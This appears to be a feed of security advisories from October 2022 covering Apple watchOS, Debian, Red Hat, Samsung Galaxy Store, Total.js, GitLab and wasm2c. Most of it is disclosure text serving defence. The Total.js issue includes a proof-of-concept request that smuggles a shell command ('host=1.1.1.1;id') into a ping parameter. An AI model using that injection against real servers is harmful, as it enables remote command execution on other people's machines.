Apple Security Advisory 2022-10-27-13 - watchOS 9 addresses buffer overflow, bypass, code execution, out of bounds read, out of bounds write, spoofing, and use-after-free vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-2022-10-27-13 watchOS 9

watchOS 9 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/HT213486.

Accelerate Framework  
Available for: Apple Watch Series 4 and later  
Impact: Processing a maliciously crafted image may lead to arbitrary  
code execution  
Description: A memory consumption issue was addressed with improved  
memory handling.  
CVE-2022-42795: ryuzaki

AppleAVD  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: This issue was addressed with improved checks.  
CVE-2022-32907: Natalie Silvanovich of Google Project Zero, Antonio  
Zekic (@antoniozekic) and John Aakerblom (@jaakerblom), ABC Research  
s.r.o, Yinyi Wu, Tommaso Bianco (@cutesmilee__)

Apple Neural Engine  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to leak sensitive kernel state  
Description: The issue was addressed with improved memory handling.  
CVE-2022-32858: Mohamed Ghannam (@_simo36)

Apple Neural Engine  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: The issue was addressed with improved memory handling.  
CVE-2022-32898: Mohamed Ghannam (@_simo36)  
CVE-2022-32899: Mohamed Ghannam (@_simo36)  
CVE-2022-32889: Mohamed Ghannam (@_simo36)

Contacts  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to bypass Privacy preferences  
Description: This issue was addressed with improved checks.  
CVE-2022-32854: Holger Fuhrmannek of Deutsche Telekom Security

Exchange  
Available for: Apple Watch Series 4 and later  
Impact: A user in a privileged network position may be able to  
intercept mail credentials  
Description: A logic issue was addressed with improved restrictions.  
CVE-2022-32928: an anonymous researcher

GPU Drivers  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: A use after free issue was addressed with improved  
memory management.  
CVE-2022-32903: an anonymous researcher

ImageIO  
Available for: Apple Watch Series 4 and later  
Impact: Processing an image may lead to a denial-of-service  
Description: A denial-of-service issue was addressed with improved  
validation.  
CVE-2022-1622

Image Processing  
Available for: Apple Watch Series 4 and later  
Impact: A sandboxed app may be able to determine which app is  
currently using the camera  
Description: The issue was addressed with additional restrictions on  
the observability of app states.  
CVE-2022-32913: Yiğit Can YILMAZ (@yilmazcanyigit)

Kernel  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to disclose kernel memory  
Description: The issue was addressed with improved memory handling.  
CVE-2022-32864: Linus Henze of Pinauten GmbH (pinauten.de)

Kernel  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: The issue was addressed with improved memory handling.  
CVE-2022-32866: Linus Henze of Pinauten GmbH (pinauten.de)  
CVE-2022-32911: Zweig of Kunlun Lab

Kernel  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: A use after free issue was addressed with improved  
memory management.  
CVE-2022-32914: Zweig of Kunlun Lab

Kernel  
Available for: Apple Watch Series 4 and later  
Impact: An application may be able to execute arbitrary code with  
kernel privileges. Apple is aware of a report that this issue may  
have been actively exploited.  
Description: An out-of-bounds write issue was addressed with improved  
bounds checking.  
CVE-2022-32894: an anonymous researcher

Maps  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to read sensitive location information  
Description: A logic issue was addressed with improved restrictions.  
CVE-2022-32883: Ron Masas of breakpointhq.com

MediaLibrary  
Available for: Apple Watch Series 4 and later  
Impact: A user may be able to elevate privileges  
Description: A memory corruption issue was addressed with improved  
input validation.  
CVE-2022-32908: an anonymous researcher

Notifications  
Available for: Apple Watch Series 4 and later  
Impact: A user with physical access to a device may be able to access  
contacts from the lock screen  
Description: A logic issue was addressed with improved state  
management.  
CVE-2022-32879: Ubeydullah Sümer

Sandbox  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to modify protected parts of the file  
system  
Description: A logic issue was addressed with improved restrictions.  
CVE-2022-32881: Csaba Fitzl (@theevilbit) of Offensive Security

Siri  
Available for: Apple Watch Series 4 and later  
Impact: A user with physical access to a device may be able to use  
Siri to obtain some call history information  
Description: A logic issue was addressed with improved state  
management.  
CVE-2022-32870: Andrew Goldberg of The McCombs School of Business,  
The University of Texas at Austin (linkedin.com/in/andrew-goldberg-/)

SQLite  
Available for: Apple Watch Series 4 and later  
Impact: A remote user may be able to cause a denial-of-service  
Description: This issue was addressed with improved checks.  
CVE-2021-36690

Watch app  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to read a persistent device identifier  
Description: This issue was addressed with improved entitlements.  
CVE-2022-32835: Guilherme Rambo of Best Buddy Apps (rambo.codes)

Weather  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to read sensitive location information  
Description: A logic issue was addressed with improved state  
management.  
CVE-2022-32875: an anonymous researcher

WebKit  
Available for: Apple Watch Series 4 and later  
Impact: Processing maliciously crafted web content may lead to  
arbitrary code execution  
Description: A buffer overflow issue was addressed with improved  
memory handling.  
WebKit Bugzilla: 241969  
CVE-2022-32886: P1umer(@p1umer), afang(@afang5472),  
xmzyshypnc(@xmzyshypnc1)

WebKit  
Available for: Apple Watch Series 4 and later  
Impact: Processing maliciously crafted web content may lead to  
arbitrary code execution  
Description: An out-of-bounds write issue was addressed with improved  
bounds checking.  
WebKit Bugzilla: 242047  
CVE-2022-32888: P1umer (@p1umer)

WebKit  
Available for: Apple Watch Series 4 and later  
Impact: Processing maliciously crafted web content may lead to  
arbitrary code execution  
Description: An out-of-bounds read was addressed with improved bounds  
checking.  
WebKit Bugzilla: 242762  
CVE-2022-32912: Jeonghoon Shin (@singi21a) at Theori working with  
Trend Micro Zero Day Initiative

WebKit  
Available for: Apple Watch Series 4 and later  
Impact: Visiting a website that frames malicious content may lead to  
UI spoofing  
Description: The issue was addressed with improved UI handling.  
WebKit Bugzilla: 243236  
CVE-2022-32891: @real_as3617, an anonymous researcher

WebKit  
Available for: Apple Watch Series 4 and later  
Impact: Processing maliciously crafted web content may lead to  
arbitrary code execution. Apple is aware of a report that this issue  
may have been actively exploited.  
Description: An out-of-bounds write issue was addressed with improved  
bounds checking.  
WebKit Bugzilla: 243557  
CVE-2022-32893: an anonymous researcher

Wi-Fi  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to cause unexpected system termination or  
write kernel memory  
Description: An out-of-bounds write issue was addressed with improved  
bounds checking.  
CVE-2022-32925: Wang Yu of Cyberserval

Additional recognition

AppleCredentialManager  
We would like to acknowledge @jonathandata1 for their assistance.

FaceTime  
We would like to acknowledge an anonymous researcher for their  
assistance.

Kernel  
We would like to acknowledge an anonymous researcher for their  
assistance.

Mail  
We would like to acknowledge an anonymous researcher for their  
assistance.

Sandbox  
We would like to acknowledge Csaba Fitzl (@theevilbit) of Offensive  
Security for their assistance.

UIKit  
We would like to acknowledge Aleczander Ewing for their assistance.

WebKit  
We would like to acknowledge an anonymous researcher for their  
assistance.

WebRTC  
We would like to acknowledge an anonymous researcher for their  
assistance.

Instructions on how to update your Apple Watch software are available  
at https://support.apple.com/kb/HT204641  To check the version on  
your Apple Watch, open the Apple Watch app on your iPhone and select  
"My Watch > General > About".  Alternatively, on your watch, select  
"My Watch > General > About".  
All information is also posted on the Apple Security Updates  
web site: https://support.apple.com/en-us/HT201222.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEBP+4DupqR5Sgt1DB4RjMIDkeNxkFAmNbKpMACgkQ4RjMIDke  
Nxmucg/+L8XHGSij8F6IoUuvCuJ3u1IUfHXE5LK0BafEddVzKS87fct6KP7L3kvE  
SfdJVCOrmfVImKn3etfpDgwgZoYqF8cxeb9PO7ObVT/15GBBfuAGc+rNZ3oAeWDJ  
iYFiiWZrDnj9gz6bo0jn4dN9q8/X9iIjUCujPdkrFzXqa+KkVub9wv6/jtJGQA3O  
YgDIaV0UvcJss0uhJR9GX+A3+4zeJgUiNq2a/1qf1nOFh/O59pbHNWYnHzB91/FE  
8V+EJgfxaK/M3zDfonPI9SMa26lO+VJejOnco98of7Kk+yNoOy6xTIkBLLBURMqN  
Jxz0I3WNxjM5TQ61WzINvd198gqjyac2nVg1S4Gqkekk6VXwmQR5zaqQmzePQqp3  
qw+qhICNqFSUJPyIDQwnuCaf1MlfEj57ustS5d8g5M1fNXBlnrtJVpI/CcPIAYvo  
7pQZy/6QptmrPp6Lgv6k/Vtxi/H5s8/tHCnhtvczbdpH6lsPmCJlDSdzsK1L8krP  
82WcjBulywZWfZ4IBNi52lD+EWlmzHomcYVGQcbd0/1FLE8h5meKCvYxM5ovfk1F  
PloJY8FQgJ3b+NcTQuTD4dZ7rc+Le5WqqD4EAgYbOKgAD6Fqy47eY8yNcYJw0qXP  
5jll4mfHUJe7NHc9frZKrdpH0Cl8o9lRdRPpM+kLqteQlpNOjao=  
=Ty+V  
-----END PGP SIGNATURE-----

Apple Security Advisory 2022-10-27-13

Debian Linux Security Advisory 5264-1 - It was discovered that Apache Batik, a SVG library for Java, allowed attackers to run arbitrary Java code by processing a malicious SVG file.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5264-1                   security@debian.orghttps://www.debian.org/security/                          Markus KoschanyOctober 29, 2022                      https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : batikCVE ID         : CVE-2022-41704 CVE-2022-42890It was discovered that Apache Batik, a SVG library for Java, allowedattackers to run arbitrary Java code by processing a malicious SVG file.For the stable distribution (bullseye), these problems have been fixed inversion 1.12-4+deb11u1.We recommend that you upgrade your batik packages.For the detailed security status of batik please refer toits security tracker page at:https://security-tracker.debian.org/tracker/batikFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQKTBAEBCgB9FiEErPPQiO8y7e9qGoNf2a0UuVE7UeQFAmNdoPxfFIAAAAAALgAoaXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEFDRjNEMDg4RUYzMkVERUY2QTFBODM1RkQ5QUQxNEI5NTEzQjUxRTQACgkQ2a0UuVE7UeSwixAAz3126lRuHpJFXreXL0dbIwiahb36LhtNx29gI7C5QkzFt49svIswJ7JM+n9GokhtggWNuyN7wF6fyQzH7VEZSYW9yzzoUbbduJoTnBArtwYyuKdfg1KnWl7h/Wzvd8JuyLtMDCXivlqNbatfenoipUclYtB7bupb+8YX71GKxh/vXU9kR6jS5eQLUnLk2SdbVMfwEna+KqEjt4yyS7SXWNJcMOVPbQLPhvjq8xMVAaShxNjn0hk7gGEtH2TBFSp7UcX8kmuPCES/70t8cS7jiA8FjRRz1M8Lf12SZGLbCCtZMQdlY4Lc0OP22Di2PTwSU0cg6dQJPR9zbXeBMA6Bff6hsCs4eFUugmPE28N7zSs4cjiNvn//+Kf4C/unsaOMR6bony/z9AqjxjvYv34h3AVd0/8Bg9GLe6kYX38EaY7D/biiZKPgbkQzXo6DU7rm8fFEGcTj/1yY+ScgznkfPob6QYLpT+b0jF+KpLPfA/Lz2bOh2DNHUVV9hKLC3t8i02KPhxrwbbpeJ7L7F8o/Giw0Ho6m0RLCTm2+sR57t7cHF9B0PH7qZRsgMp4GSrydeUUK8SZGMus1NnSmqbfd4GiY2Wohd3GiN+YqIK4lWbhNi3RZg2VFaGsVRRVtnBAgaCCZcd0BjvNEIpOoPXro97I0lqwKiAqBnKZobh86/dU==yzAL-----END PGP SIGNATURE-----

Debian Security Advisory 5264-1

Red Hat Security Advisory 2022-7257-01 - A minor version update is now available for Red Hat Camel K that includes CVE fixes in the base images. Details are linked in the References section.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Low: Red Hat Integration Camel-K 1.8.1 security update  
Advisory ID:       RHSA-2022:7257-01  
Product:           Red Hat Integration  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:7257  
Issue date:        2022-10-27  
CVE Names:         CVE-2021-28169 CVE-2022-30973   
=====================================================================

1. Summary:

A micro version update is now available for Red Hat Integration Camel K.  
The purpose of this text-only errata is to inform you about the security  
issues fixed in this release.

Red Hat Product Security has rated this update as having a security impact  
of Low. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Description:

A minor version update is now available for Red Hat Camel K that includes  
CVE fixes in the base images. Details are linked in the References section.

Security Fix(es):

* jetty: requests to the ConcatServlet and WelcomeFilter are able to access  
protected resources within the WEB-INF directory (CVE-2021-28169)

* tika-core: incomplete fix for CVE-2022-30126 (CVE-2022-30973)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

3. Solution:

Before applying this update, make sure all previously released errata  
relevant to your system have been applied.

For details on how to apply this update, refer to:

https://access.redhat.com/articles/11258

4. Bugs fixed (https://bugzilla.redhat.com/):

1971016 - CVE-2021-28169 jetty: requests to the ConcatServlet and WelcomeFilter are able to access protected resources within the WEB-INF directory  
2099553 - CVE-2022-30973 tika-core: incomplete fix for CVE-2022-30126

5. References:

https://access.redhat.com/security/cve/CVE-2021-28169  
https://access.redhat.com/security/cve/CVE-2022-30973  
https://access.redhat.com/security/updates/classification/#low  
https://access.redhat.com/jbossnetwork/restricted/listSoftware.html?downloadType=distributions&product=red.hat.integration&version=2022-Q4  
https://access.redhat.com/documentation/en-us/red_hat_integration/2022.q4

6. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY1x5zdzjgjWX9erEAQiIrQ//Q2Lhg4KrEnawcwk25oS501LhW1jpwkG9  
qUds7B+MYQQu1IYCz1wlLfPXIlfuazOmwI2NPTU7EjAhVgW9jjV/eKMQvnfNU6Rp  
erSabNWInCcR9FmEeSuXyhWhJwTL/+5onSHoyDGzCxxx5UbWddn46qPM35wxxf8u  
4vnzF1Z54/yBNsqVKHHgCNVRkyr/kqf08W38cSCdtzH6oxfHNAse3PbkDA1LqIAe  
xcjVB8q/qilCQo82azUAbHJ8+FfImV+rpIg2DNXCOt/++l2KdAiafGxg0w4+nPVw  
tm+DQ4xBECJeeuk6PV4VjJy7snNCtowO3nmBkmSmOW3cXawLB8ff5y9Ns7fdv+Vx  
ImQh32ux6Tk4MMVsjp+ThnO3bI1Kvo9aG5UoEWQcwCR8R05LQQVe7uS8yx+gJBLE  
VXC+o65hR/IZ5N+BHeJigBpIx0kjlsWoFHHD71HSWsbv11MfHeBt+vrVp/E9mjJH  
Xztud0pbbdIACUtPOMXE2L7bUTF2A27SXpbmeMWtCTs7Tk4u64SWRMFEQwOwemDo  
b+Wz2UgfxRKBSk63sXrOgUdEb9JxY8s8yuBHIP41o4ZZCPVHu04Qu9hcOEWMD1jZ  
qdBCyFJSHvcYjkQ7YKEUZPcBUcxe0uMCjHIqA8kXpZVRa9AdKX7oOG7LT77FoLcs  
ZITkV9HJImk=  
=tKnI  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-7257-01

Prototype pollution vulnerability in function resolveShims in resolve-shims.js in thlorenz browserify-shim 3.8.15 via the shimPath variable in resolve-shims.js.

'use strict'; var path \= require('path') , fs \= require('fs') , util \= require('util') , parseInlineShims \= require('./parse-inline-shims') , mothership \= require('mothership') , format \= require('util').format var shimsCache \= {} , shimsByPath \= {}; function inspect(obj, depth) { return util.inspect(obj, false, depth || 5, true); } function isPath(s) { return (/^\[.\]{0,2}\[/\\\\\]/).test(s); } function validate(key, config, dir) { var msg , details \= 'When evaluating shim "' + key + '": ' + inspect(config) + '\\ninside ' + dir + '\\n'; if (!config.hasOwnProperty('exports')) { msg \= 'browserify-shim needs at least a path and exports to do its job, you are missing the exports. ' + '\\nIf this module has no exports, specify exports as null.' throw new Error(details + msg); } } function updateCache(packageDir, pack, resolvedShims, exposeGlobals) { shimsCache\[packageDir\] \= { pack: pack, shims: resolvedShims, exposeGlobals: exposeGlobals }; Object.keys(resolvedShims).forEach(function(fullPath) { var shim \= resolvedShims\[fullPath\]; validate(fullPath, shim, packageDir); shimsByPath\[fullPath\] \= shim; }); } function resolveDependsRelativeTo(dir, browser, depends, packDeps, messages) { var resolved; if (!depends) return undefined; return Object.keys(depends).reduce(function (acc, k) { if (browser\[k\]){ acc\[k\] \= depends\[k\]; messages.push(format('Found depends "%s" exposed in browser field', k)); } else if (!isPath(k)) { acc\[k\] \= depends\[k\]; if (packDeps\[k\]) { messages.push(format('Found depends "%s" as an installed dependency of the package', k)); } else { messages.push(format('WARNING, depends "%s" is not a path, nor is it exposed in the browser field, nor was it found in package dependencies.', k)); } } else { // otherwise resolve the path resolved \= path.resolve(dir, k); acc\[resolved\] \= depends\[k\]; messages.push(format('Depends "%s" was resolved to be at \[%s\]', k, resolved)); } return acc; }, {}) } function resolvePaths (packageDir, shimFileDir, browser, shims, packDeps, messages) { return Object.keys(shims) .reduce(function (acc, relPath) { var shim \= shims\[relPath\]; var exposed \= browser\[relPath\]; var shimPath; if (exposed) { // lib exposed under different name/path in package.json's browser field // and it is referred to by this alias in the shims (either external or in package.json) // i.e.: 'non-cjs': { ... } -> browser: { 'non-cjs': './vendor/non-cjs.js } shimPath \= path.resolve(packageDir, exposed); messages.push(format('Found "%s" in browser field referencing "%s" and resolved it to "%s"', relPath, exposed, shimPath)); } else if (shimFileDir) { // specified via relative path to shim file inside shim file // i.e. './vendor/non-cjs': { exports: .. } shimPath \= path.resolve(shimFileDir, relPath); messages.push(format('Resolved "%s" found in shim file to "%s"', relPath, shimPath)); } else { // specified via relative path in package.json browserify-shim config // i.e. 'browserify-shim': { './vendor/non-cjs': 'noncjs' } shimPath \= path.resolve(packageDir, relPath); messages.push(format('Resolved "%s" found in package.json to "%s"', relPath, shimPath)); } var depends \= resolveDependsRelativeTo(shimFileDir || packageDir, browser, shim.depends, packDeps, messages); acc\[shimPath\] \= { exports: shim.exports, depends: depends }; return acc; }, {}); } function mapifyExposeGlobals(exposeGlobals) { return Object.keys(exposeGlobals) .reduce(function (acc, k) { var val \= exposeGlobals\[k\]; var parts \= val.split(':'); if (parts.length < 2 || !parts\[1\].length) { throw new Error( 'Expose Globals need to have the format "global:expression.\\n"' + inspect({ key: k, value: val }) + 'does not.' ); } // this also handle unlikely cases of 'global:\_.someFunc(':')' with a \`:\` in the actual global expression parts.shift(); acc\[k\] \= parts.join(':'); return acc; }, {}); } function separateExposeGlobals(shims) { var onlyShims \= {} , exposeGlobals \= {}; Object.keys(shims).forEach(function (k) { var val \= shims\[k\] , exp \= val && val.exports; if (exp && /^global\\:/.test(exp)) { exposeGlobals\[k\] \= exp; } else { onlyShims\[k\] \= val; } }); return { shims: onlyShims, exposeGlobals: mapifyExposeGlobals(exposeGlobals) }; } function resolveFromShimFile(packageDir, pack, shimField, messages) { var shimFile \= path.join(packageDir, shimField) , shimFileDir \= path.dirname(shimFile); var allShims \= require(shimFile); var separated \= separateExposeGlobals(allShims); var resolvedShims \= resolvePaths(packageDir, shimFileDir, pack.browser || {}, separated.shims, pack.dependencies || {}, messages); return { shims: resolvedShims, exposeGlobals: separated.exposeGlobals }; } function resolveInlineShims(packageDir, pack, shimField, messages) { var allShims \= parseInlineShims(shimField); var separated \= separateExposeGlobals(allShims); var resolvedShims \= resolvePaths(packageDir, null, pack.browser || {}, separated.shims, pack.dependencies || {}, messages); return { shims: resolvedShims, exposeGlobals: separated.exposeGlobals }; } var resolve \= module.exports \= function resolveShims (file, messages, cb) { // find the package.json that defines browserify-shim config for this file mothership(file, function (pack) { return !! pack\['browserify-shim'\] }, function (err, res) { if (err) return cb(err); if (!res || !res.pack) return cb(new Error('Unable to find a browserify-shim config section in the package.json for ' + file)); var pack \= res.pack; var packFile \= res.path; var packageDir \= path.dirname(packFile); // we cached this before which means it was also grouped by file var cached \= shimsCache\[packageDir\]; // if it was cached, that means any package fixes were applied as well if (cached) { return cb(null, { package\_json : packFile , packageDir : packageDir , resolvedPreviously : true , shim : shimsByPath\[file\] , exposeGlobals : cached.exposeGlobals , browser : pack.browser , 'browserify-shim' : pack\['browserify-shim'\] , dependencies : pack.dependencies }); } try { pack \= require(packFile); var shimField \= pack\['browserify-shim'\]; if (!shimField) return cb(null, { package\_json: packFile, shim: undefined }); var resolved \= typeof shimField \=== 'string' ? resolveFromShimFile(packageDir, pack, shimField, messages) : resolveInlineShims(packageDir, pack, shimField, messages); messages.push({ resolved: resolved.shims }); updateCache(packageDir, pack, resolved.shims, resolved.exposeGlobals); cb(null, { package\_json : packFile , packageDir : packageDir , shim : shimsByPath\[file\] , exposeGlobals : resolved.exposeGlobals , browser : pack.browser , 'browserify-shim' : pack\['browserify-shim'\] , dependencies : pack.dependencies }); } catch (err) { console.trace(); return cb(err); } }); }

CVE-2022-37623: browserify-shim/resolve-shims.js at 464b32bbe142664cd9796059798f6c738ea3de8f · thlorenz/browserify-shim

A Regular Expression Denial of Service (ReDoS) flaw was found in kangax html-minifier 4.0.0 via the candidate variable in htmlminifier.js.

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Pick a username

Email Address

Password

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

CVE-2022-37620: CVE-2022-37620/ ReDoS found in htmlminifier.js · Issue #1135 · kangax/html-minifier

OpenShift API for Data Protection (OADP) 1.0.5 is now available.
Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.

Related CVEs:
* CVE-2022-21698: prometheus/client_golang: Denial of service using InstrumentHandlerCounter


Skip to navigation Skip to main content

**Utilities**

*   Subscriptions
*   Downloads
*   Containers
*   Support Cases

**Infrastructure and Management**

*   Red Hat Enterprise Linux
*   Red Hat Virtualization
*   Red Hat Identity Management
*   Red Hat Directory Server
*   Red Hat Certificate System
*   Red Hat Satellite
*   Red Hat Subscription Management
*   Red Hat Update Infrastructure
*   Red Hat Insights
*   Red Hat Ansible Automation Platform

**Cloud Computing**

*   Red Hat OpenShift
*   Red Hat CloudForms
*   Red Hat OpenStack Platform
*   Red Hat OpenShift Container Platform
*   Red Hat OpenShift Data Science
*   Red Hat OpenShift Online
*   Red Hat OpenShift Dedicated
*   Red Hat Advanced Cluster Security for Kubernetes
*   Red Hat Advanced Cluster Management for Kubernetes
*   Red Hat Quay
*   Red Hat CodeReady Workspaces
*   Red Hat OpenShift Service on AWS

**Storage**

*   Red Hat Gluster Storage
*   Red Hat Hyperconverged Infrastructure
*   Red Hat Ceph Storage
*   Red Hat OpenShift Data Foundation

**Runtimes**

*   Red Hat Runtimes
*   Red Hat JBoss Enterprise Application Platform
*   Red Hat Data Grid
*   Red Hat JBoss Web Server
*   Red Hat Single Sign On
*   Red Hat support for Spring Boot
*   Red Hat build of Node.js
*   Red Hat build of Thorntail
*   Red Hat build of Eclipse Vert.x
*   Red Hat build of OpenJDK
*   Red Hat build of Quarkus

**Integration and Automation**

*   Red Hat Process Automation
*   Red Hat Process Automation Manager
*   Red Hat Decision Manager

All Products

Issued:

2022-10-31

Updated:

2022-10-31

**RHSA-2022:7261 - Security Advisory**

*   Overview
*   Updated Packages

**Synopsis**

Moderate: OpenShift API for Data Protection (OADP) 1.0.5 security and bug fix update

**Type/Severity**

Security Advisory: Moderate

**Topic**

OpenShift API for Data Protection (OADP) 1.0.5 is now available.  

Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

**Description**

OpenShift API for Data Protection (OADP) enables you to back up and restore application resources, persistent volume data, and internal container images to external backup storage. OADP enables both file system-based and snapshot-based backups for persistent volumes.  

Security Fix(es):  

*   prometheus/client\_golang: Denial of service using InstrumentHandlerCounter (CVE-2022-21698)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

**Affected Products**

*   OpenShift API for Data Protection 1 x86\_64

**Fixes**

*   BZ - 2045880 - CVE-2022-21698 prometheus/client\_golang: Denial of service using InstrumentHandlerCounter
*   OADP-801 - Openshift plugin does not add Migration Plan labels on all resources
*   OADP-812 - openshift-adp-controller-manager should not continuously log once dpa reaches reconciled
*   OADP-829 - Registry pod going in crashloopbackoff state
*   OADP-823 - Check OADP and Openshift Versions and warn / error on compatibility

**OpenShift API for Data Protection 1**

SRPM

x86\_64

The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/.

RHSA-2022:7261: Red Hat Security Advisory: OpenShift API for Data Protection (OADP) 1.0.5 security and bug fix update

A now-patched security flaw has been disclosed in the Galaxy Store app for Samsung devices that could potentially trigger remote command execution on affected phones.
The vulnerability, which affects Galaxy Store version 4.5.32.4, relates to a cross-site scripting (XSS) bug that occurs when handling certain deep links. An independent security researcher has been credited with reporting the issue

A now-patched security flaw has been disclosed in the Galaxy Store app for Samsung devices that could potentially trigger remote command execution on affected phones.

The vulnerability, which affects Galaxy Store version 4.5.32.4, relates to a cross-site scripting (XSS) bug that occurs when handling certain deep links. An independent security researcher has been credited with reporting the issue.

"Here, by not checking the deep link securely, when a user accesses a link from a website containing the deeplink, the attacker can execute JS code in the webview context of the Galaxy Store application," SSD Secure Disclosure said in an advisory posted last week.

XSS attacks allow an adversary to inject and execute malicious JavaScript code when visiting a website from a browser or another application.

The issue identified in the Galaxy Store app has to do with how deep links are configured for Samsung's Marketing & Content Service (MCS), potentially leading to a scenario where arbitrary code injected into the MCS website could lead to its execution.

This could then be leveraged to download and install malware-laced apps on the Samsung device when visiting the link.

"To be able to successfully exploit the victim's server, it is necessary to have HTTPS and CORS bypass of chrome," the researchers noted.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Samsung Galaxy Store Bug Could've Let Hackers Secretly Install Apps on Targeted Devices

In Total.js 4 before 0e5ace7, /api/common/ping can achieve remote command execution via shell metacharacters in the host parameter.

Using the API /api/common/ping it's possible to achieve remote command execution on the host machine. This leads to complete control over the machine hosting the server.

    POST /api/common/ping HTTP/1.1
    Host: 0.0.0.0:8000
    User-Agent: bla-bla-bla
    Cookie: your-auth-cookie
    Content-Length: 15
    
    host=1.1.1.1;id
    

	schema.addWorkflow('ping', function($) {
		var host \= $.model.host.replace(/'|"|\\n/g, '');
		Exec('ping -c 3 {0}'.format(host), $.done(true));
	});

Here the problem is the fact that the server doesn't sanitize correctly the input checking that the host provided is a legitimate one, allowing also characters like ;, | or &.

CVE-2022-44019: [Security] Remote command execution · Issue #12 · totaljs/code

An issue has been discovered in GitLab affecting all versions starting from 10.0 before 12.9.8, all versions starting from 12.10 before 12.10.7, all versions starting from 13.0 before 13.0.1. TODO

Skip to content

GitLab

Next

*   *   GitLab: the DevOps platform
    *   Explore GitLab
    *   Install GitLab
    *   How GitLab compares
    *   Get started
    *   GitLab docs
    *   GitLab Learn
    
*   Pricing
*   Talk to an expert

*   /
    
*   

*   Help
    
    *   Help
    *   Support
    *   Community forum
    
    *   Submit feedback
    *   Contribute to GitLab
    
*   *   
    
    Projects Groups Snippets
    
*   Sign up now
*   Login
*   Sign in / Register
    

*   GitLab.org
*   cves
*   Repository

Switch branch/tag

*   cves
*   2022
*   **CVE-2022-2826.json**

Find file BlameHistoryPermalink

*   Publishing 0 updated advisories and 1 new advisories · 5bf91700
    
    🤖 GitLab Bot 🤖 authored Oct 28, 2022
    
    5bf91700

CVE-2022-2826: 2022/CVE-2022-2826.json · master · GitLab.org / cves · GitLab

wasm2c v1.0.29 was discovered to contain an abort in CWriter::Write.

**Environment**

    OS      : Linux ubuntu 5.15.0-46-generic #49~20.04.1-Ubuntu SMP Thu Aug 4 19:15:44 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
    Commit  : 3054d61f703d609995798f872fc86b462617c294
    Version : 1.0.29
    Build   : make clang-debug-asan
    

**Proof of concept**

poc\_wasm2c-1.wasm  
poc\_wasm2c-1.wasm.zip

**Stack dump**

    gdb /wabt/out/clang/Debug/asan/wasm2c
    pwndbg> r  --enable-multi-memory ./poc_wasm2c-1.wasm
    context:
    LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
    ─────────────────────────────────[ REGISTERS ]──────────────────────────────────
     RAX  0x0
    *RBX  0x7ffff7a357c0 ◂— 0x7ffff7a357c0
    *RCX  0x7ffff7a7b00b (raise+203) —▸ 0x10824848b48 ◂— 0x0
     RDX  0x0
    *RDI  0x2
    *RSI  0x7fffffff6990 ◂— 0x0
     R8   0x0
    *R9   0x7fffffff6990 ◂— 0x0
    *R10  0x8
    *R11  0x246
    *R12  0x43e420 (_start) ◂— endbr64
    *R13  0x7fffffffe070 ◂— 0x3
     R14  0x0
     R15  0x0
    *RBP  0x7fffffff88f0 —▸ 0x7fffffff8930 —▸ 0x7fffffffa650 —▸ 0x7fffffffa690 —▸ 0x7fffffffc3c0 ◂— ...
    *RSP  0x7fffffff6990 ◂— 0x0
